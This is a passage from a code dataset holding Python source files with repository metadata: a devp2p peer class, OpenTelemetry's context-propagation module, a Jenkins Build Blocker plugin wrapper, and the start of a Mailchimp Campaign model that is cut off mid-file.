084d58bd98e1573ccce82fbb766ff06fb6831fe4
|
[
"MIT"
] | null | null | null |
devp2p/peer.py
|
vaporyproject/pydevp2p
|
084d58bd98e1573ccce82fbb766ff06fb6831fe4
|
[
"MIT"
] | null | null | null |
devp2p/peer.py
|
vaporyproject/pydevp2p
|
084d58bd98e1573ccce82fbb766ff06fb6831fe4
|
[
"MIT"
] | null | null | null |
import time
import gevent
import operator
from collections import OrderedDict
from protocol import BaseProtocol
from p2p_protocol import P2PProtocol
from service import WiredService
import multiplexer
from muxsession import MultiplexedSession
from crypto import ECIESDecryptionError
import slogging
import gevent.socket
import rlpxcipher
log = slogging.get_logger('p2p.peer')
class UnknownCommandError(Exception):
"raised if we recive an unknown command for a known protocol"
pass
| 39.408397
| 99
| 0.613462
|
import time
import gevent
import operator
from collections import OrderedDict
from protocol import BaseProtocol
from p2p_protocol import P2PProtocol
from service import WiredService
import multiplexer
from muxsession import MultiplexedSession
from crypto import ECIESDecryptionError
import slogging
import gevent.socket
import rlpxcipher
log = slogging.get_logger('p2p.peer')
class UnknownCommandError(Exception):
"raised if we recive an unknown command for a known protocol"
pass
class Peer(gevent.Greenlet):
remote_client_version = ''
wait_read_timeout = 0.001
def __init__(self, peermanager, connection, remote_pubkey=None): # FIXME node vs remote_pubkey
super(Peer, self).__init__()
self.is_stopped = False
self.peermanager = peermanager
self.connection = connection
self.config = peermanager.config
self.protocols = OrderedDict()
log.debug('peer init', peer=self)
# create multiplexed encrypted session
privkey = self.config['node']['privkey_hex'].decode('hex')
hello_packet = P2PProtocol.get_hello_packet(self)
self.mux = MultiplexedSession(privkey, hello_packet,
token_by_pubkey=dict(), remote_pubkey=remote_pubkey)
# register p2p protocol
assert issubclass(self.peermanager.wire_protocol, P2PProtocol)
self.connect_service(self.peermanager)
# assure, we don't get messages while replies are not read
self.safe_to_read = gevent.event.Event()
self.safe_to_read.set()
@property
def remote_pubkey(self):
"if peer is responder, then the remote_pubkey will not be available"
"before the first packet is received"
return self.mux.remote_pubkey
def __repr__(self):
try:
pn = self.connection.getpeername()
except gevent.socket.error:
pn = ('not ready',)
try:
cv = '/'.join(self.remote_client_version.split('/')[:2])
except:
cv = self.remote_client_version
return '<Peer%r %s>' % (pn, cv)
# return '<Peer%r>' % repr(pn)
def report_error(self, reason):
try:
ip_port = self.ip_port
except:
ip_port = 'ip_port not available fixme'
self.peermanager.errors.add(ip_port, reason, self.remote_client_version)
@property
def ip_port(self):
try:
return self.connection.getpeername()
except Exception as e:
log.debug('ip_port failed')
raise e
def connect_service(self, service):
assert isinstance(service, WiredService)
protocol_class = service.wire_protocol
assert issubclass(protocol_class, BaseProtocol)
# create protcol instance which connects peer with serivce
protocol = protocol_class(self, service)
# register protocol
assert protocol_class not in self.protocols
log.debug('registering protocol', protocol=protocol.name, peer=self)
self.protocols[protocol_class] = protocol
self.mux.add_protocol(protocol.protocol_id)
protocol.start()
def has_protocol(self, protocol):
assert issubclass(protocol, BaseProtocol)
return protocol in self.protocols
def receive_hello(self, proto, version, client_version, capabilities, listen_port, nodeid):
# register in common protocols
log.info('received hello', version=version,
client_version=client_version, capabilities=capabilities)
self.remote_client_version = client_version
# call peermanager
agree = self.peermanager.on_hello_received(
proto, version, client_version, capabilities, listen_port, nodeid)
if not agree:
return
log.debug('connecting services', services=self.peermanager.wired_services)
remote_services = dict((name, version) for name, version in capabilities)
for service in sorted(self.peermanager.wired_services, key=operator.attrgetter('name')):
proto = service.wire_protocol
assert isinstance(service, WiredService)
if proto.name in remote_services:
if remote_services[proto.name] == proto.version:
if service != self.peermanager: # p2p protcol already registered
self.connect_service(service)
else:
log.debug('wrong version', service=proto.name, local_version=proto.version,
remote_version=remote_services[proto.name])
self.report_error('wrong version')
@property
def capabilities(self):
return [(s.wire_protocol.name, s.wire_protocol.version)
for s in self.peermanager.wired_services]
# sending p2p messages
def send_packet(self, packet):
# rewrite cmd id / future FIXME to packet.protocol_id
for i, protocol in enumerate(self.protocols.values()):
if packet.protocol_id == protocol.protocol_id:
break
assert packet.protocol_id == protocol.protocol_id, 'no protocol found'
log.debug('send packet', cmd=protocol.cmd_by_id[packet.cmd_id], protcol=protocol.name,
peer=self)
# rewrite cmd_id # FIXME
for i, protocol in enumerate(self.protocols.values()):
if packet.protocol_id > i:
packet.cmd_id += (0 if protocol.max_cmd_id == 0 else protocol.max_cmd_id + 1)
if packet.protocol_id == protocol.protocol_id:
break
packet.protocol_id = 0
# done rewrite
self.mux.add_packet(packet)
# receiving p2p messages
def protocol_cmd_id_from_packet(self, packet):
# packet.protocol_id not yet used. old adaptive cmd_ids instead
# future FIXME to packet.protocol_id
# get protocol and protocol.cmd_id from packet.cmd_id
max_id = 0
assert packet.protocol_id == 0 # FIXME, should be used by other peers
for protocol in self.protocols.values():
if packet.cmd_id < max_id + protocol.max_cmd_id + 1:
return protocol, packet.cmd_id - (0 if max_id == 0 else max_id + 1)
max_id += protocol.max_cmd_id
raise UnknownCommandError('no protocol for id %s' % packet.cmd_id)
def _handle_packet(self, packet):
assert isinstance(packet, multiplexer.Packet)
try:
protocol, cmd_id = self.protocol_cmd_id_from_packet(packet)
except UnknownCommandError, e:
log.error('received unknown cmd', error=e, packet=packet)
return
log.debug('recv packet', cmd=protocol.cmd_by_id[
cmd_id], protocol=protocol.name, orig_cmd_id=packet.cmd_id)
packet.cmd_id = cmd_id # rewrite
protocol.receive_packet(packet)
def send(self, data):
if not data:
return
self.safe_to_read.clear() # make sure we don't accept any data until message is sent
try:
self.connection.sendall(data) # check if gevent chunkes and switches contexts
log.debug('wrote data', size=len(data), ts=time.time())
except gevent.socket.error as e:
log.debug('write error', errno=e.errno, reason=e.strerror)
self.report_error('write error %r' % e.strerror)
self.stop()
except gevent.socket.timeout:
log.debug('write timeout')
self.report_error('write timeout')
self.stop()
self.safe_to_read.set()
def _run_egress_message(self):
while not self.is_stopped:
self.send(self.mux.message_queue.get())
def _run_decoded_packets(self):
# handle decoded packets
while not self.is_stopped:
self._handle_packet(self.mux.packet_queue.get()) # get_packet blocks
def _run_ingress_message(self):
log.debug('peer starting main loop')
assert not self.connection.closed, "connection is closed"
gevent.spawn(self._run_decoded_packets)
gevent.spawn(self._run_egress_message)
while not self.is_stopped:
self.safe_to_read.wait()
try:
gevent.socket.wait_read(self.connection.fileno())
except gevent.socket.error as e:
log.debug('read error', errno=e.errno, reason=e.strerror, peer=self)
self.report_error('network error %s' % e.strerror)
if e.errno in(9,):
# ('Bad file descriptor')
self.stop()
else:
raise e
break
try:
imsg = self.connection.recv(4096)
except gevent.socket.error as e:
log.debug('read error', errno=e.errno, reason=e.strerror, peer=self)
self.report_error('network error %s' % e.strerror)
if e.errno in(50, 54, 60, 65):
# (Network down, Connection reset by peer, timeout, nor route to host)
self.stop()
else:
raise e
break
if imsg:
log.debug('read message', ts=time.time(), size=len(imsg))
try:
self.mux.add_message(imsg)
except (rlpxcipher.RLPxSessionError, ECIESDecryptionError) as e:
log.debug('rlpx session error', peer=self, error=e)
self.report_error('rlpx session error')
self.stop()
except multiplexer.MultiplexerError as e:
log.debug('multiplexer error', peer=self, error=e)
self.report_error('multiplexer error')
self.stop()
else:
log.debug('no data on socket', peer=self)
self.report_error('no data on socket')
self.stop()
_run = _run_ingress_message
def stop(self):
if not self.is_stopped:
self.is_stopped = True
log.debug('stopped', peer=self)
for p in self.protocols.values():
p.stop()
self.peermanager.peers.remove(self)
self.kill()
| 8,985
| 825
| 23
|
6050b5f4ff89903ef691871454833dc5d07ce689
| 5,340
|
py
|
Python
|
opentelemetry-api/src/opentelemetry/propagate/__init__.py
|
toumorokoshi/opentelemetry-python
|
03c6b7391d16236ad5d4e48b0cb0bff786c2e583
|
[
"Apache-2.0"
] | 1
|
2021-02-26T02:37:54.000Z
|
2021-02-26T02:37:54.000Z
|
opentelemetry-api/src/opentelemetry/propagate/__init__.py
|
jini-lee/opentelemetry-python
|
99128b35d1a9cf2ecb04097c6a87d320a552a3e4
|
[
"Apache-2.0"
] | 1
|
2020-11-18T17:44:08.000Z
|
2020-11-18T17:46:17.000Z
|
opentelemetry-api/src/opentelemetry/propagate/__init__.py
|
jini-lee/opentelemetry-python
|
99128b35d1a9cf2ecb04097c6a87d320a552a3e4
|
[
"Apache-2.0"
] | null | null | null |
# Copyright The OpenTelemetry Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
API for propagation of context.
The propagators for the
``opentelemetry.propagators.composite.CompositeHTTPPropagator`` can be defined
via configuration in the ``OTEL_PROPAGATORS`` environment variable. This
variable should be set to a comma-separated string of names of values for the
``opentelemetry_propagator`` entry point. For example, setting
``OTEL_PROPAGATORS`` to ``tracecontext,baggage`` (which is the default value)
would instantiate
``opentelemetry.propagators.composite.CompositeHTTPPropagator`` with 2
propagators, one of type
``opentelemetry.trace.propagation.tracecontext.TraceContextTextMapPropagator``
and other of type ``opentelemetry.baggage.propagation.BaggagePropagator``.
Notice that these propagator classes are defined as
``opentelemetry_propagator`` entry points in the ``setup.cfg`` file of
``opentelemetry``.
Example::
import flask
import requests
from opentelemetry import propagators
PROPAGATOR = propagators.get_global_textmap()
def get_header_from_flask_request(request, key):
return request.headers.get_all(key)
def set_header_into_requests_request(request: requests.Request,
key: str, value: str):
request.headers[key] = value
def example_route():
context = PROPAGATOR.extract(
get_header_from_flask_request,
flask.request
)
request_to_downstream = requests.Request(
"GET", "http://httpbin.org/get"
)
PROPAGATOR.inject(
set_header_into_requests_request,
request_to_downstream,
context=context
)
session = requests.Session()
session.send(request_to_downstream.prepare())
.. _Propagation API Specification:
https://github.com/open-telemetry/opentelemetry-specification/blob/main/specification/context/api-propagators.md
"""
import typing
from logging import getLogger
from os import environ
from pkg_resources import iter_entry_points
from opentelemetry.context.context import Context
from opentelemetry.environment_variables import OTEL_PROPAGATORS
from opentelemetry.propagators import composite
from opentelemetry.trace.propagation import textmap
logger = getLogger(__name__)
def extract(
    getter: textmap.Getter[textmap.TextMapPropagatorT],
    carrier: textmap.TextMapPropagatorT,
    context: typing.Optional[Context] = None,
) -> Context:
    """Uses the configured propagator to extract a Context from the carrier.
    Args:
        getter: an object which contains a get function that can retrieve zero
        or more values from the carrier and a keys function that can get all the keys
        from carrier.
        carrier: an object which contains values that are
        used to construct a Context. This object
        must be paired with an appropriate getter
        which understands how to extract a value from it.
        context: an optional Context to use. Defaults to current
        context if not set.
    """
    # Delegates to the global propagator assembled from OTEL_PROPAGATORS
    # at module import time.
    return get_global_textmap().extract(getter, carrier, context)
def inject(
    set_in_carrier: textmap.Setter[textmap.TextMapPropagatorT],
    carrier: textmap.TextMapPropagatorT,
    context: typing.Optional[Context] = None,
) -> None:
    """Uses the configured propagator to inject a Context into the carrier.
    Args:
        set_in_carrier: A setter function that can set values
        on the carrier.
        carrier: An object that contains a representation of HTTP
        headers. Should be paired with set_in_carrier, which
        should know how to set header values on the carrier.
        context: an optional Context to use. Defaults to current
        context if not set.
    """
    # Delegates to the global propagator assembled from OTEL_PROPAGATORS
    # at module import time.
    get_global_textmap().inject(set_in_carrier, carrier, context)
# Assemble the default global propagator from the OTEL_PROPAGATORS
# environment variable (a comma-separated list of entry-point names,
# defaulting to "tracecontext,baggage").
try:
    propagators = []
    # Single use variable here to hack black and make lint pass
    environ_propagators = environ.get(
        OTEL_PROPAGATORS, "tracecontext,baggage",
    )
    # Resolve each name through the "opentelemetry_propagator" entry point;
    # next() raises StopIteration for an unknown name (caught below), and
    # .load()() instantiates the propagator class.
    for propagator in environ_propagators.split(","):
        propagators.append(  # type: ignore
            next(  # type: ignore
                iter_entry_points("opentelemetry_propagator", propagator)
            ).load()()
        )
except Exception:  # pylint: disable=broad-except
    # Fail fast at import time: log the traceback and re-raise so a
    # misconfigured OTEL_PROPAGATORS value is never silently ignored.
    logger.exception("Failed to load configured propagators")
    raise
_HTTP_TEXT_FORMAT = composite.CompositeHTTPPropagator(propagators)  # type: ignore
| 34.451613
| 116
| 0.720412
|
# Copyright The OpenTelemetry Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
API for propagation of context.
The propagators for the
``opentelemetry.propagators.composite.CompositeHTTPPropagator`` can be defined
via configuration in the ``OTEL_PROPAGATORS`` environment variable. This
variable should be set to a comma-separated string of names of values for the
``opentelemetry_propagator`` entry point. For example, setting
``OTEL_PROPAGATORS`` to ``tracecontext,baggage`` (which is the default value)
would instantiate
``opentelemetry.propagators.composite.CompositeHTTPPropagator`` with 2
propagators, one of type
``opentelemetry.trace.propagation.tracecontext.TraceContextTextMapPropagator``
and other of type ``opentelemetry.baggage.propagation.BaggagePropagator``.
Notice that these propagator classes are defined as
``opentelemetry_propagator`` entry points in the ``setup.cfg`` file of
``opentelemetry``.
Example::
import flask
import requests
from opentelemetry import propagators
PROPAGATOR = propagators.get_global_textmap()
def get_header_from_flask_request(request, key):
return request.headers.get_all(key)
def set_header_into_requests_request(request: requests.Request,
key: str, value: str):
request.headers[key] = value
def example_route():
context = PROPAGATOR.extract(
get_header_from_flask_request,
flask.request
)
request_to_downstream = requests.Request(
"GET", "http://httpbin.org/get"
)
PROPAGATOR.inject(
set_header_into_requests_request,
request_to_downstream,
context=context
)
session = requests.Session()
session.send(request_to_downstream.prepare())
.. _Propagation API Specification:
https://github.com/open-telemetry/opentelemetry-specification/blob/main/specification/context/api-propagators.md
"""
import typing
from logging import getLogger
from os import environ
from pkg_resources import iter_entry_points
from opentelemetry.context.context import Context
from opentelemetry.environment_variables import OTEL_PROPAGATORS
from opentelemetry.propagators import composite
from opentelemetry.trace.propagation import textmap
logger = getLogger(__name__)
def extract(
    getter: textmap.Getter[textmap.TextMapPropagatorT],
    carrier: textmap.TextMapPropagatorT,
    context: typing.Optional[Context] = None,
) -> Context:
    """Pull a Context out of ``carrier`` via the global propagator.
    Args:
        getter: object exposing a ``get`` function that reads zero or more
            values from the carrier and a ``keys`` function that lists all
            keys present in it.
        carrier: object holding the values used to construct a Context;
            must be paired with a getter that knows how to read from it.
        context: optional Context to use; the current context is used
            when omitted.
    """
    active_propagator = get_global_textmap()
    return active_propagator.extract(getter, carrier, context)
def inject(
    set_in_carrier: textmap.Setter[textmap.TextMapPropagatorT],
    carrier: textmap.TextMapPropagatorT,
    context: typing.Optional[Context] = None,
) -> None:
    """Write a Context into ``carrier`` via the global propagator.
    Args:
        set_in_carrier: setter function capable of storing values on the
            carrier.
        carrier: object containing a representation of HTTP headers;
            paired with ``set_in_carrier``, which knows how to write
            header values onto it.
        context: optional Context to use; the current context is used
            when omitted.
    """
    active_propagator = get_global_textmap()
    active_propagator.inject(set_in_carrier, carrier, context)
# Assemble the default global propagator from the OTEL_PROPAGATORS
# environment variable (a comma-separated list of entry-point names,
# defaulting to "tracecontext,baggage").
try:
    propagators = []
    # Single use variable here to hack black and make lint pass
    environ_propagators = environ.get(
        OTEL_PROPAGATORS, "tracecontext,baggage",
    )
    # Resolve each name through the "opentelemetry_propagator" entry point;
    # next() raises StopIteration for an unknown name (caught below), and
    # .load()() instantiates the propagator class.
    for propagator in environ_propagators.split(","):
        propagators.append(  # type: ignore
            next(  # type: ignore
                iter_entry_points("opentelemetry_propagator", propagator)
            ).load()()
        )
except Exception:  # pylint: disable=broad-except
    # Fail fast at import time: log the traceback and re-raise so a
    # misconfigured OTEL_PROPAGATORS value is never silently ignored.
    logger.exception("Failed to load configured propagators")
    raise
_HTTP_TEXT_FORMAT = composite.CompositeHTTPPropagator(propagators)  # type: ignore
def get_global_textmap() -> textmap.TextMapPropagator:
    """Return the process-wide text-map propagator used by extract()/inject()."""
    return _HTTP_TEXT_FORMAT
def set_global_textmap(http_text_format: textmap.TextMapPropagator,) -> None:
    """Replace the process-wide text-map propagator.
    Args:
        http_text_format: the propagator instance to install globally.
    """
    global _HTTP_TEXT_FORMAT  # pylint:disable=global-statement
    _HTTP_TEXT_FORMAT = http_text_format  # type: ignore
| 239
| 0
| 46
|
1043a523f50f48d4196a7df72c983eb7845b8ba5
| 4,272
|
py
|
Python
|
src/pyjen/plugins/buildblocker.py
|
TheFriendlyCoder/pyjen
|
a3d7e8f69cb53f80f627300f8d3aa0d4302a5ac1
|
[
"Apache-2.0"
] | 5
|
2017-12-14T13:39:04.000Z
|
2020-07-06T09:46:02.000Z
|
src/pyjen/plugins/buildblocker.py
|
TheFriendlyCoder/pyjen
|
a3d7e8f69cb53f80f627300f8d3aa0d4302a5ac1
|
[
"Apache-2.0"
] | 119
|
2016-09-13T01:39:31.000Z
|
2020-08-31T03:06:19.000Z
|
src/pyjen/plugins/buildblocker.py
|
TheFriendlyCoder/pyjen
|
a3d7e8f69cb53f80f627300f8d3aa0d4302a5ac1
|
[
"Apache-2.0"
] | 3
|
2015-03-17T18:49:22.000Z
|
2019-07-03T14:10:27.000Z
|
"""Interfaces for interacting with Build Blockers job property plugin"""
import xml.etree.ElementTree as ElementTree
from pyjen.utils.xml_plugin import XMLPlugin
class BuildBlockerProperty(XMLPlugin):
    """Wrapper for Build Blocker job properties
    https://wiki.jenkins-ci.org/display/JENKINS/Build+Blocker+Plugin
    """
    QUEUE_SCAN_TYPES = ("DISABLED", "ALL", "BUILDABLE")
    LEVEL_TYPES = ("GLOBAL", "NODE")
    @property
    def queue_scan(self):
        """str: checks to see whether build blocking scans the build queue or
        not. One of BuildBlockerProperty.QUEUE_SCAN_TYPES.
        """
        retval = self._root.find("scanQueueFor").text
        assert retval in BuildBlockerProperty.QUEUE_SCAN_TYPES
        return retval
    # NOTE: the three setter bodies below were missing, leaving dangling
    # @x.setter decorators stacked onto the next @property and corrupting
    # the level/blockers/is_enabled descriptors; restored here.
    @queue_scan.setter
    def queue_scan(self, value):
        """Sets the queue scan mode; must be one of QUEUE_SCAN_TYPES"""
        if value not in BuildBlockerProperty.QUEUE_SCAN_TYPES:
            raise ValueError(
                "Build blocker queue scan may only be one of the following "
                "types: " + ",".join(BuildBlockerProperty.QUEUE_SCAN_TYPES))
        self._root.find("scanQueueFor").text = value
        self.update()
    @property
    def level(self):
        """str: the scope of the blocked job settings. One of
        BuildBlockerProperty.LEVEL_TYPES"""
        retval = self._root.find("blockLevel").text
        assert retval in BuildBlockerProperty.LEVEL_TYPES
        return retval
    @level.setter
    def level(self, value):
        """Sets the blocking scope; must be one of LEVEL_TYPES"""
        if value not in BuildBlockerProperty.LEVEL_TYPES:
            raise ValueError(
                "Build blocker scope level may only be one of the following "
                "types: " + ",".join(BuildBlockerProperty.LEVEL_TYPES))
        self._root.find("blockLevel").text = value
        self.update()
    @property
    def blockers(self):
        """list (str): list of search criteria for blocking jobs"""
        temp = self._root.find("blockingJobs").text
        return temp.split()
    @blockers.setter
    def blockers(self, patterns):
        """Sets the blocking-job search criteria (a str or a list of str)"""
        node = self._root.find("blockingJobs")
        if isinstance(patterns, str):
            node.text = patterns
        else:
            node.text = "\n".join(patterns)
        self.update()
    @property
    def is_enabled(self):
        """bool: True if these blocking jobs are enabled, False if not"""
        temp = self._root.find("useBuildBlocker").text
        return temp.lower() == "true"
    def enable(self):
        """Enables this set of build blockers"""
        node = self._root.find("useBuildBlocker")
        node.text = "true"
        self.update()
    def disable(self):
        """Disables this set of build blockers"""
        node = self._root.find("useBuildBlocker")
        node.text = "false"
        self.update()
    # --------------------------------------------------------------- PLUGIN API
    @staticmethod
    def get_jenkins_plugin_name():
        """str: the name of the Jenkins plugin associated with this PyJen plugin
        This static method is used by the PyJen plugin API to associate this
        class with a specific Jenkins plugin, as it is encoded in the config.xml
        """
        return "hudson.plugins.buildblocker.BuildBlockerProperty"
    @classmethod
    def instantiate(cls, patterns):
        """Factory method used to instantiate an instance of this plugin
        Args:
            patterns (list, str):
                One or more names or regular expressions for jobs that block the
                execution of this one.
        Returns:
            BuildBlockerProperty:
                reference to the newly instantiated object
        """
        default_xml = """
        <hudson.plugins.buildblocker.BuildBlockerProperty>
        <useBuildBlocker>true</useBuildBlocker>
        <blockLevel>GLOBAL</blockLevel>
        <scanQueueFor>DISABLED</scanQueueFor>
        </hudson.plugins.buildblocker.BuildBlockerProperty>"""
        root_node = ElementTree.fromstring(default_xml)
        jobs_node = ElementTree.SubElement(root_node, "blockingJobs")
        if isinstance(patterns, str):
            jobs_node.text = patterns
        else:
            jobs_node.text = " ".join(patterns)
        return cls(root_node)
PluginClass = BuildBlockerProperty
if __name__ == "__main__": # pragma: no cover
pass
| 33.904762
| 80
| 0.630852
|
"""Interfaces for interacting with Build Blockers job property plugin"""
import xml.etree.ElementTree as ElementTree
from pyjen.utils.xml_plugin import XMLPlugin
class BuildBlockerProperty(XMLPlugin):
"""Wrapper for Build Blocker job properties
https://wiki.jenkins-ci.org/display/JENKINS/Build+Blocker+Plugin
"""
QUEUE_SCAN_TYPES = ("DISABLED", "ALL", "BUILDABLE")
LEVEL_TYPES = ("GLOBAL", "NODE")
@property
def queue_scan(self):
"""str: checks to see whether build blocking scans the build queue or
not. One of BuildBlockerProperty.QUEUE_SCAN_TYPES.
"""
retval = self._root.find("scanQueueFor").text
assert retval in BuildBlockerProperty.QUEUE_SCAN_TYPES
return retval
@queue_scan.setter
def queue_scan(self, value):
if value not in BuildBlockerProperty.QUEUE_SCAN_TYPES:
raise ValueError(
"Build blocker queue scan may only be one of the following "
"types: " + ",".join(BuildBlockerProperty.QUEUE_SCAN_TYPES))
self._root.find("scanQueueFor").text = value
self.update()
@property
def level(self):
"""str: the scope of the blocked job settings. One of
BuildBlockerProperty.LEVEL_TYPES"""
retval = self._root.find("blockLevel").text
assert retval in BuildBlockerProperty.LEVEL_TYPES
return retval
@level.setter
def level(self, value):
if value not in BuildBlockerProperty.LEVEL_TYPES:
raise ValueError(
"Build blocker scope level may only be one of the following "
"types: " + ",".join(BuildBlockerProperty.LEVEL_TYPES))
self._root.find("blockLevel").text = value
self.update()
@property
def blockers(self):
"""list (str): list of search criteria for blocking jobs"""
temp = self._root.find("blockingJobs").text
return temp.split()
@blockers.setter
def blockers(self, patterns):
node = self._root.find("blockingJobs")
if isinstance(patterns, str):
node.text = patterns
else:
node.text = "\n".join(patterns)
self.update()
@property
def is_enabled(self):
"""bool: True if these blocking jobs are enabled, False if not"""
temp = self._root.find("useBuildBlocker").text
return temp.lower() == "true"
def enable(self):
"""Enables this set of build blockers"""
node = self._root.find("useBuildBlocker")
node.text = "true"
self.update()
def disable(self):
"""Disables this set of build blockers"""
node = self._root.find("useBuildBlocker")
node.text = "false"
self.update()
# --------------------------------------------------------------- PLUGIN API
@staticmethod
def get_jenkins_plugin_name():
"""str: the name of the Jenkins plugin associated with this PyJen plugin
This static method is used by the PyJen plugin API to associate this
class with a specific Jenkins plugin, as it is encoded in the config.xml
"""
return "hudson.plugins.buildblocker.BuildBlockerProperty"
@classmethod
def instantiate(cls, patterns):
"""Factory method used to instantiate an instance of this plugin
Args:
patterns (list, str):
One or more names or regular expressions for jobs that block the
execution of this one.
Returns:
BuildBlockerProperty:
reference to the newly instantiated object
"""
default_xml = """
<hudson.plugins.buildblocker.BuildBlockerProperty>
<useBuildBlocker>true</useBuildBlocker>
<blockLevel>GLOBAL</blockLevel>
<scanQueueFor>DISABLED</scanQueueFor>
</hudson.plugins.buildblocker.BuildBlockerProperty>"""
root_node = ElementTree.fromstring(default_xml)
jobs_node = ElementTree.SubElement(root_node, "blockingJobs")
if isinstance(patterns, str):
jobs_node.text = patterns
else:
jobs_node.text = " ".join(patterns)
return cls(root_node)
PluginClass = BuildBlockerProperty
if __name__ == "__main__": # pragma: no cover
pass
| 848
| 0
| 78
|
57f9052e1cbafb791fa47203f832f9c3230b7a65
| 22,764
|
py
|
Python
|
mailchimp_marketing_asyncio/models/campaign.py
|
john-parton/mailchimp-asyncio
|
3865ca0867bec8f537dc1e3256aa3a160c00f8a2
|
[
"Apache-2.0"
] | null | null | null |
mailchimp_marketing_asyncio/models/campaign.py
|
john-parton/mailchimp-asyncio
|
3865ca0867bec8f537dc1e3256aa3a160c00f8a2
|
[
"Apache-2.0"
] | null | null | null |
mailchimp_marketing_asyncio/models/campaign.py
|
john-parton/mailchimp-asyncio
|
3865ca0867bec8f537dc1e3256aa3a160c00f8a2
|
[
"Apache-2.0"
] | 1
|
2022-03-09T14:52:22.000Z
|
2022-03-09T14:52:22.000Z
|
# coding: utf-8
"""
Mailchimp Marketing API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: 3.0.74
Contact: apihelp@mailchimp.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class Campaign(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'id': 'str',
'web_id': 'int',
'parent_campaign_id': 'str',
'type': 'str',
'create_time': 'datetime',
'archive_url': 'str',
'long_archive_url': 'str',
'status': 'str',
'emails_sent': 'int',
'send_time': 'datetime',
'content_type': 'str',
'needs_block_refresh': 'bool',
'resendable': 'bool',
'recipients': 'List3',
'settings': 'CampaignSettings2',
'variate_settings': 'ABTestOptions',
'tracking': 'CampaignTrackingOptions1',
'rss_opts': 'RSSOptions',
'ab_split_opts': 'ABTestingOptions',
'social_card': 'CampaignSocialCard',
'report_summary': 'CampaignReportSummary2',
'delivery_status': 'CampaignDeliveryStatus',
'links': 'list[ResourceLink]'
}
attribute_map = {
'id': 'id',
'web_id': 'web_id',
'parent_campaign_id': 'parent_campaign_id',
'type': 'type',
'create_time': 'create_time',
'archive_url': 'archive_url',
'long_archive_url': 'long_archive_url',
'status': 'status',
'emails_sent': 'emails_sent',
'send_time': 'send_time',
'content_type': 'content_type',
'needs_block_refresh': 'needs_block_refresh',
'resendable': 'resendable',
'recipients': 'recipients',
'settings': 'settings',
'variate_settings': 'variate_settings',
'tracking': 'tracking',
'rss_opts': 'rss_opts',
'ab_split_opts': 'ab_split_opts',
'social_card': 'social_card',
'report_summary': 'report_summary',
'delivery_status': 'delivery_status',
'links': '_links'
}
def __init__(self, id=None, web_id=None, parent_campaign_id=None, type=None, create_time=None, archive_url=None, long_archive_url=None, status=None, emails_sent=None, send_time=None, content_type=None, needs_block_refresh=None, resendable=None, recipients=None, settings=None, variate_settings=None, tracking=None, rss_opts=None, ab_split_opts=None, social_card=None, report_summary=None, delivery_status=None, links=None): # noqa: E501
"""Campaign - a model defined in Swagger""" # noqa: E501
self._id = None
self._web_id = None
self._parent_campaign_id = None
self._type = None
self._create_time = None
self._archive_url = None
self._long_archive_url = None
self._status = None
self._emails_sent = None
self._send_time = None
self._content_type = None
self._needs_block_refresh = None
self._resendable = None
self._recipients = None
self._settings = None
self._variate_settings = None
self._tracking = None
self._rss_opts = None
self._ab_split_opts = None
self._social_card = None
self._report_summary = None
self._delivery_status = None
self._links = None
self.discriminator = None
if id is not None:
self.id = id
if web_id is not None:
self.web_id = web_id
if parent_campaign_id is not None:
self.parent_campaign_id = parent_campaign_id
if type is not None:
self.type = type
if create_time is not None:
self.create_time = create_time
if archive_url is not None:
self.archive_url = archive_url
if long_archive_url is not None:
self.long_archive_url = long_archive_url
if status is not None:
self.status = status
if emails_sent is not None:
self.emails_sent = emails_sent
if send_time is not None:
self.send_time = send_time
if content_type is not None:
self.content_type = content_type
if needs_block_refresh is not None:
self.needs_block_refresh = needs_block_refresh
if resendable is not None:
self.resendable = resendable
if recipients is not None:
self.recipients = recipients
if settings is not None:
self.settings = settings
if variate_settings is not None:
self.variate_settings = variate_settings
if tracking is not None:
self.tracking = tracking
if rss_opts is not None:
self.rss_opts = rss_opts
if ab_split_opts is not None:
self.ab_split_opts = ab_split_opts
if social_card is not None:
self.social_card = social_card
if report_summary is not None:
self.report_summary = report_summary
if delivery_status is not None:
self.delivery_status = delivery_status
if links is not None:
self.links = links
@property
def id(self):
"""Gets the id of this Campaign. # noqa: E501
A string that uniquely identifies this campaign. # noqa: E501
:return: The id of this Campaign. # noqa: E501
:rtype: str
"""
return self._id
@id.setter
def id(self, id):
"""Sets the id of this Campaign.
A string that uniquely identifies this campaign. # noqa: E501
:param id: The id of this Campaign. # noqa: E501
:type: str
"""
self._id = id
@property
def web_id(self):
"""Gets the web_id of this Campaign. # noqa: E501
The ID used in the Mailchimp web application. View this campaign in your Mailchimp account at `https://{dc}.admin.mailchimp.com/campaigns/show/?id={web_id}`. # noqa: E501
:return: The web_id of this Campaign. # noqa: E501
:rtype: int
"""
return self._web_id
@web_id.setter
def web_id(self, web_id):
"""Sets the web_id of this Campaign.
The ID used in the Mailchimp web application. View this campaign in your Mailchimp account at `https://{dc}.admin.mailchimp.com/campaigns/show/?id={web_id}`. # noqa: E501
:param web_id: The web_id of this Campaign. # noqa: E501
:type: int
"""
self._web_id = web_id
@property
def parent_campaign_id(self):
"""Gets the parent_campaign_id of this Campaign. # noqa: E501
If this campaign is the child of another campaign, this identifies the parent campaign. For Example, for RSS or Automation children. # noqa: E501
:return: The parent_campaign_id of this Campaign. # noqa: E501
:rtype: str
"""
return self._parent_campaign_id
@parent_campaign_id.setter
